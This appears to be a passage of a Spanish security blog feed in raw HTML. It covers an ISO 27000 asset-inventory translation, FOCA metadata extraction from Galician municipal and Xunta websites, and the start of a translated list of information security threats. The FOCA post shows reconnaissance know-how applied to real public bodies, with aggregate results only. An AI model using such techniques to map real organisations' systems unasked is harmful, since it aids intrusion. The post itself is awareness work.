class="Apple-style-span" style="font-size: small;">"Debido a que los activos son algo cambiante, incluso si pudieras cubrir absolutamente todo lo que hay hoy, mañana la situación sería un poco diferente y más en unas semanas, meses o años. Así que es perfectamente aceptable seguir con un inventario "suficientemente bueno por ahora", siempre incluyendo en el SGSI la revisión y actualización de procesos como parte de la mejora continua"</span></i></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">Traducción del artículo:</span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div><div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">ACTIVOS DE INFORMACIÓN PURA</span></b></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;"><br /></span></b></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Datos digitales</span></b><span class="Apple-style-span" style="font-size: small;">: Personales, financieros, legales, de investigación y desarrollo, estratégicos y comerciales, correo electrónico, contestadores automáticos, bases de datos, unidades lógicas(particiones) privadas y compartidas, copias de seguridad(cintas, CDs, DVDs), claves de cifrado.</span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Activos tangibles</span></b><span class="Apple-style-span" style="font-size: small;">: Personales, financieros, legales, de investigación y desarrollo, estratégicos y comerciales, correo tradicional/electrónico, FAXs, microficheros y otros materiales de copia de seguridad/archivo, llaves de oficinas/cajas fuertes y otros medios de almacenamiento, libros, revistas, periódicos.</span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">-</span><b><span class="Apple-style-span" style="font-size: small;"> Activos intangibles</span></b><span class="Apple-style-span" style="font-size: small;">: Conocimiento, relaciones y secretos comerciales, licencias, patentes, experiencia, conocimientos técnicos, imagen corporativa/marca/reputación comercial/confianza de los clientes, ventaja competitiva, ética, productividad.</span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Software de aplicación</span></b><span class="Apple-style-span" style="font-size: small;">: propietario desarrollado por la empresa, de cliente(compartido y aplicaciones de escritorio), COTS, de planificación de recursos empresariales(ERP), de gestión de la información(MIS), utilidades y herramientas de bases de datos, aplicaciones de comercio electrónico, middleware.</span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span></span></span><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><b><span class="Apple-style-span" style="font-size: small;">Sistemas operativos</span></b><span class="Apple-style-span" style="font-size: small;">: Para los servidores, ordenadores de sobremesa, ordenadores centrales, dispositivos de red, dispositivos de mano e incrustados (incluyendo la BIOS y el firmware).</span></span></div><div><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">ACTIVOS FÍSICOS</span></b></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Infraestructura de TI</span></b><span class="Apple-style-span" style="font-size: small;">: Edificios, centros de datos, habitaciones de equipos y servidores, armarios de red/cableado, oficinas, escritorios/cajones/archivadores, salas de almacenamiento de medios físicos y cajas de seguridad, dispositivos de identificación y autentificación/control acceso del personal (tornos, tarjetas, etc) y otros dispositivos de seguridad (circuito cerrado de televisión(CCTV), etc.)</span></span></span></div><div><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Controles del entorno de TI</span></b><span class="Apple-style-span" style="font-size: small;">: Equipos de alarma/supresión contra incendio, sistemas de alimentación ininterrumpida (SAI), alimentación de potencia y de red, acondicionadores/filtros/supresores de potencia, deshumificadores/refrigeradores/alarmas de aire, alarmas de agua.</span></span></div><div><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Hardware de TI</span></b><span class="Apple-style-span" style="font-size: small;">: Dispositivos de almacenamiento y cómputo como ordenadores de sobremesa, estaciones de trabajo, portátiles, equipos de mano, servidores, mainframes, módems, líneas de terminación de red, dispositivos de comunicaciones (nodos de la red), impresoras/fotocopiadoras/faxes y equipos multifunción.</span></span></div><div><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">ACTIVOS DE SERVICIOS DE TI</span></b></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">Servicios de autenticación de usuario y administración de procesos de usuario, enlaces, cortafuegos, servidores proxy, servicios de red, servicios inalámbricos, anti-spam/virus/spyware, detección/prevención de intrusiones, teletrabajo, seguridad, FTP, correo electrónico/mensajería instantánea, etc., servicios web, contratos de soporte y mantenimiento de software.</span></span></span></div><div><div><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><b><span class="Apple-style-span" style="font-size: small;">ACTIVOS HUMANOS:</span></b></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Empleados</span></b><span class="Apple-style-span" style="font-size: small;">: Personal y directivos, en particular los que tienen roles de gestión como altos cargos o directores ejecutivos, arquitectos de software y desarrolladores/probadores, administradores de sistemas, administradores de seguridad, operadores, abogados, auditores, usuarios con poder y expertos en general.</span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;">- </span><b><span class="Apple-style-span" style="font-size: small;">Externos</span></b><span class="Apple-style-span" style="font-size: small;">: Trabajadores temporales, consultores externos o asesores especialistas, los contratistas especializados (por ejemplo, los que entienden el mantenimiento del entorno físico de TI), proveedores y socios ...</span></span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div><div><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">En lo referente a software para crear el inventario en </span><a href="http://iso27000.wik.is/Area_Normas/ISO//IEC_27002/07._Gesti%C3%B3n_de_Activos/7.1._Responsabilidad_sobre_los_activos/7.1.1._Inventario_de_Activos"><span class="Apple-style-span" style="font-size: small;">este wiki</span></a><span class="Apple-style-span" style="font-size: small;"> sobre ISO 27000 se nos ofrece alguna opción de pago y una hoja de cálculo gratis, pero una vez más me quedo con la alternativa de foro ISO2K7 [ muchas gracias ;) ], en su </span><a href="http://www.iso27001security.com/ISO27k_toolkit_3v9.zip"><span class="Apple-style-span" style="font-size: small;">toolkit</span></a><span class="Apple-style-span" style="font-size: small;"> tenemos una hoja de cálculo mucho más completa organizada por tipo de activo (</span><i><span class="Apple-style-span" style="font-size: small;">ISO27k Asset Register.xls</span></i><span class="Apple-style-span" style="font-size: small;">)</span></span></div></div><div><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div></div></div><div><span class="Apple-style-span" style="font-size: small;"><br /></span></div><a href="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/TAU6Narr4lI/AAAAAAAAAIw/Ydy7BSWIpLU/s1600/imagen.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5477848523941339730" src="http://4.bp.blogspot.com/_2sYHpwLKJ8Y/TAU6Narr4lI/AAAAAAAAAIw/Ydy7BSWIpLU/s320/imagen.png" style="cursor: hand; cursor: pointer; display: block; height: 320px; margin: 0px auto 10px; text-align: center; width: 303px;" /></a><br /><div><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="font-family: Trebuchet, 'Trebuchet MS', Arial, sans-serif; line-height: 20px;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></span></span></span></div><div><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Nota: Esta entrada tiene licencia</span></span></span><span class="Apple-style-span" style="color: #333333;"><a href="http://creativecommons.org/licenses/by-nc-sa/3.0/" style="color: #666666; text-decoration: none;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></a><a href="http://creativecommons.org/licenses/by-nc-sa/3.0/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Attribution-Noncommercial-Share Alike 3.0 Unported</span></span></a></span><span class="Apple-style-span" style="color: #333333;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para respetar la del texto original.</span></span></span></span></span></div><div><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div><div><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></span></div><div style="text-align: right;"><span class="Apple-style-span" style="color: #333333; font-family: verdana;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;">Jesús Pérez</span></span></span></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-4011073713728962696?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-75670826861445254932010-05-10T19:57:00.015+02:002012-02-11T18:21:10.421+01:00Jugando con la FOCA 2: Metadatos en los ayuntamientos gallegos<div style="font-family: verdana;"><div><div><div style="text-align: left;">Hace unos días asistí al webcast sobre la nueva versión de la <a href="http://www.informatica64.com/FOCA/">FOCA</a> de la gente de <a href="http://www.informatica64.com/">Informática 64</a>, aprovecho para darles las gracias desde aquí por la charla que me sirvió para resolver algunas dudas que me surgieron cuando la probé. No voy a explicar los problemas asociados a los metadatos en los documentos, dejo <a href="http://elladodelmal.blogspot.com/2008/09/metadatos-en-microsoft-office-i-de-v.html">este enlace</a> donde lo explica <a href="http://elladodelmal.blogspot.com/">Chema Alonso</a> para el caso de los formatos de Microsoft Office. Un resumen rápido: todo documento tiene asociada una información relativa a sí mismo y hay herramientas que permiten extraerlos, pero también las hay para limpiarlos, el <a href="http://oometaextractor.codeplex.com/">OOMetaExtractor</a> es GPL :) y los elimina de los tipos de archivo del OpenOffice.</div><div><br /></div><div>Al terminar el webcast me puse a hacer unas pruebas y por curiosidad se me ocurrió probar con la dirección de la web de mi ayuntamiento y como podía suponer nadie limpia los metadatos de los documentos publicados. A continuación comprobé que en otros ayuntamientos pasaba lo mismo, así como en la web de <a href="http://www.xunta.es/portada">A Xunta de Galicia</a>. Para tener una idea general de como están las cosas hice un recuento usando los sitios de 8 de los ayuntamientos más importantes y el de A Xunta. Descargué los ficheros en proyectos por separado y después de arrastrar las carpetas que los contenían a la FOCA obtuve los metadatos (<span style="font-style: italic;">Metadata/Extract all documents metadata</span>) y este es el resultado:</div></div><div><br /></div><a href="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/S-bpYpyOfuI/AAAAAAAAAIA/pmgg5a3kwCM/s1600/imagen.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5469315407230697186" src="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/S-bpYpyOfuI/AAAAAAAAAIA/pmgg5a3kwCM/s200/imagen.png" style="cursor: pointer; display: block; height: 185px; margin: 0px auto 10px; text-align: center; width: 200px;" /></a><br /><div><div style="text-align: center;"><br /></div><div>Vemos que en Galicia no nos preocupamos por los metadatos, es una pena que no esté disponible la versión 2.0.3 de la FOCA que incorpora el buscador <a href="http://www.exalead.com/search/">Exalead</a> y encuentra muchos más documentos del tipo WordPerfect, como nos mostró Chema en el webcast . Esta lista muestra el numero de elementos no repetidos para cada categoría, no tendría sentido usar todos estos datos juntos en un test de intrusión ya que son de dominios sin relación ninguna pero si nos permite observar el volumen de datos sensibles que se puede extraer con un par de clicks de tan solo 8 páginas web. Lo que sí nos puede interesar algo más es el software usado para la crear de los documentos:</div><div><br /></div></div></div><a href="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/S-bt5bkzgpI/AAAAAAAAAIQ/ekKz29WB3mU/s1600/imagen.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5469320368398500498" src="http://1.bp.blogspot.com/_2sYHpwLKJ8Y/S-bt5bkzgpI/AAAAAAAAAIQ/ekKz29WB3mU/s320/imagen.png" style="cursor: pointer; display: block; height: 180px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a><br /><div><br /></div><div>No pego la <a href="http://docs.google.com/Doc?docid=0AQcRyhSRYqnmZGZxOG44cXFfMjJna3RqcHFoaA&hl=es">lista completa</a> porque alargaría demasiado la entrada, así que dejo algunos:</div><div><div><div>PDFCreator Version 0.8.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>GNU Ghostscript 7.06<span class="Apple-tab-span" style="white-space: pre;"><br /></span></div><div>OpenOffice 2.3<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Adobe InDesign CS3 (5.0.3)<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Adobe PDF Library 8.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>PScript5.dll Version 5.2.2<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Acrobat Distillier 7.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Microsoft Office 95<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>OpenOffice 3.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>PFU ScanSnap Manager 4.2.14<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Microsoft Office 2000<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>ADOBEPS4.DRV Version 4.50<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>AppleWorks 6<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>QuarkXPress<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Microsoft Office 2007<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>CorelDRAW<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Corel PDF Engine 14.0.0.567<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Microsoft Office 2008 for Mac<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Adobe Illustrator 10.0<span class="Apple-tab-span" style="white-space: pre;"><br /></span></div><div>Adobe InDesign CS3 (5.0.4)<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>PSCRIPT.DRV Version 4.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Acrobat Distillier 3.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Acrobat PDF Writer 3.0 para Windows<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Windows NT 4.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Adobe LiveCycle Designer 8.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>DynaPDF 2.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>PDF Complete version 3.0.31.1<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Macromedia FlashPaper 2.02.2302.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>PDFlib 5.0.3<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>FreeHand MX: pictwpstops filter 1.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Adobe Photoshop CS3<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>pdfFactory Pro www.pdffactory.com<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>pdfFactory Pro 2.35 (Windows XP Professional Spanish)<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>Adobe Designer 7.0<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div>pdftk 1.41 - www.pdftk.com<span class="Apple-tab-span" style="white-space: pre;"> </span></div><div><br /></div></div></div><div style="text-align: left;">Esto no quiere decir que en los ayuntamientos/Xunta esté todo este software instalado, podría ser que el Photoshop sea de un estudio de diseño que es el que hizo el .pdf y que después se cuelgue directamente en la web. Lo que me llama la atención es la cantidad de software propietario distinto que se usa para crear un documento de ofimática cuando se puede hacer todo esto con el OpenOffice, y mejor no hacer comentarios sobre las versiones "Pro"... Esto puede tener dos lecturas, que en la administración usen copias piratas, lo cual estaría muy muy mal por su parte... ;) o que estén tirando nuestro dinero gastando en software que no es necesario, lo que no sería muy entendible teniendo en cuenta la <a href="http://imit.xunta.es/portal/actualidade/novas/2010_01_27.html?__locale=es">campaña de apoyo al software libre</a>, <a href="http://galinux.mancomun.org/">distribución de Linux inclusive</a>, de A Xunta.</div><div style="text-align: left;"><br /></div><div>Para acabar la entrada voy a decirle a la FOCA que analice los metadatos extraídos (<i>Metadata/Analize metadata</i>), pero en este caso solo voy a utilizar los del caso de A Xunta ya que, como dije antes, no tiene sentido analizar conjuntamente los de dominios independientes. Quiero remarcar que <b>solo</b> utilizo las funcionalidades de la foca relacionadas con los metadatos, aunque incorpora otras muchas para ayudarnos a pintar una red durante un test de intrusión, este es el resultado:</div></div><br /><a href="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S-gxZgpFOHI/AAAAAAAAAIg/F0-o9iwr55A/s1600/imagen.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5469676061770201202" src="http://2.bp.blogspot.com/_2sYHpwLKJ8Y/S-gxZgpFOHI/AAAAAAAAAIg/F0-o9iwr55A/s320/imagen.png" style="cursor: pointer; display: block; height: 312px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a><br />Ya tendríamos 77 clientes y 3 servidores posibles con su sistema operativo para comenzar una auditoría solo utilizando la información relativa a los metadatos. Y como vemos, mucho software libre por aquí tampoco hay ... :(<br /><br /><br /><div style="text-align: right;">Jesús Pérez</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7743819158194184549-7567082686144525493?l=nicerosniunos.blogspot.com' alt='' /></div>Jesús Pérezhttp://www.blogger.com/profile/09565740223441207640noreply@blogger.com0tag:blogger.com,1999:blog-7743819158194184549.post-17087523731799997472010-05-09T11:26:00.030+02:002012-02-11T18:18:24.393+01:00"Top" riesgos en seguridad de la información (I): Introducción y amenazas<span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Mientras me documentaba sobre la serie </span></span><a href="http://www.iso27000.es/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">ISO 27000</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> de cara a mi proyecto de fin de carrera se me ocurrió si habría alguna lista con los riesgos o disconformidades más comunes encontrados en las auditorías, algo similar al </span></span><a href="http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">OWASP Top 10</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">. Me quedo con </span></span><a href="http://www.iso27001security.com/Top_information_security_risks_for_2008.pdf"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">éste articulo</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> publicado por la gente del </span></span><a href="http://groups.google.com/group/iso27001security"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">foro ISO27k</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">en colaboración con </span></span><a href="http://www.noticebored.com/html/cisspforumfaq.html"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">CISSPForum</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> que, a pesar de ser del 2008, me parece la mejor elección ya que la mayoría de listas de este tipo abordan el tema desde el prisma de la seguridad informática más que desde él de la </span></span><a href="http://es.wikipedia.org/wiki/Seguridad_de_la_informaci%C3%B3n"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">seguridad de la información</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> y, en este caso, los autores del artículo son auditores con una amplia trayectoria profesional. El objetivo de este artículo es familiarizarme con muchos de los problemas que me voy a encontrar durante una auditoría, intentaré traducirlo añadiendo algunos ejemplos o comentarios que faciliten su comprensión con un vocabulario más accesible a todo el mundo ya que las metodologías suelen utilizar un lenguaje diferente al que estamos acostumbrados.</span></span><br /><div style="font-family: verdana;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div style="font-family: verdana;"><div><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Introducción</span></span></b></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Antes de comenzar es necesario aclarar algunas definiciones de los términos que se van a usar y que según los autores del texto original pueden causar confusión. Se definen en armonía el estándar internacional ISO/IES 27001:</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Activo: Cualquier información o sistema relacionado con el tratamiento de la misma que tenga valor para la organización.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Amenaza: Cualquier cosa que podría dañar algún activo de la organización.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Vulnerabilidad: Una debilidad de un activo que puede ser explotada por una amenaza.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Impacto: Medida del daño sobre el activo derivado de un incidente de seguridad.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Riesgo: Combinación de un evento y su posible impacto.</span></span></div><div><div><div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Control: Las políticas, los procedimientos, las prácticas y las estructuras organizativas concebidas para mantener los riesgos de seguridad de la información por debajo del nivel de riesgo asumido.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">(Nota: </span></span><a href="http://www.iso27000.es/glosario.html"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Este glosario</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> puede ser de ayuda con el resto de conceptos.)</span></span></div><div><span class="Apple-tab-span" style="white-space: pre;"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Se enumera en listas separadas las </span></span><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">amenazas</span></span></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">, </span></span><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">vulnerabilidades</span></span></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> e </span></span><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">impactos</span></span></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> para, a partir de ellos, elaborar la de </span></span><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">riesgos</span></span></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> y los </span></span><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">controles </span></span></b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">asociados.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div><div><b><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Amenazas</span></span></b></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">Las amenazas son todo aquello que pueda explotar, deliberada o accidentalmente, alguna vulnerabilidad causando así un incidente de seguridad de la información:</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Imposición de obligaciones legales y reguladoras, lo que puede provocar la violación de las mismas. Por eso es muy importante adecuar los controles a cada organización de forma que se puedan cumplir de una forma razonable.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Crimen organizado o grupos terroristas que usan identidades robadas y otras formas de compromiso o extorsión para financiar o apoyar actividades criminales. El famoso</span></span><a href="http://www.kriptopolis.org/fallo-critico-dns-obliga-parchear-internet"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> fallo de DNS</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> permitía engañar al a víctima usando la identidad de una página web de un banco por ejemplo.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Ciber-criminales, que pueden ser "hackers negros" muy capacitados técnicamente o alguien que pueda permitir pagarles.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Autores de "malware" como virus, gusanos o troyanos, en particular "key loggers".</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- "Phishers", incluyendo los que tienen como objetivo a usuarios individuales creando herramientas específicas para la ocasión.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- "Spammers" que malgastan el ancho de banda y llenan nuestros buzones de basura usando su "malware" y sus "botnets". Tenemos el caso reciente de la </span></span><a href="http://pandalabs.pandasecurity.com/es/red-de-bots-mariposa/"><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">red Mariposa</span></span></a><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;"> que se utilizaba para diferentes fines "por encargo".</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Personal negligente como programadores, arquitectos de software, "testers" y directores de proyectos que pueden causar o hacer fallar la prevención de vulnerabilidades. El 80% de fugas de información confidencial tienen origen en usuarios internos con acceso autorizado a la información.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Actos intencionados o desastres naturales que pueden interrumpir, dañar o destruir activos y servicios. Engloba desde incendios provocados hasta tornados, inundaciones, etc.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- Estafadores que usan las TI(Tecnologías de la información) para explotar las debilidades en sus controles. Se centran en procesos de negocio activos pudiendo explotar directamente una vulnerabilidad en los sistemas o en otros tipos de información que no reside en sistemas informáticos. Un ejemplo sería un ataque por ingeniería social en el que se consiguen robar algún soporte extraible donde se almacenan las copias de seguridad.</span></span></div><div><span class="Apple-style-span" style="font-family: verdana;"><span class="Apple-style-span" style="font-size: small;">- "Hackers", tanto los negros como los blancos, 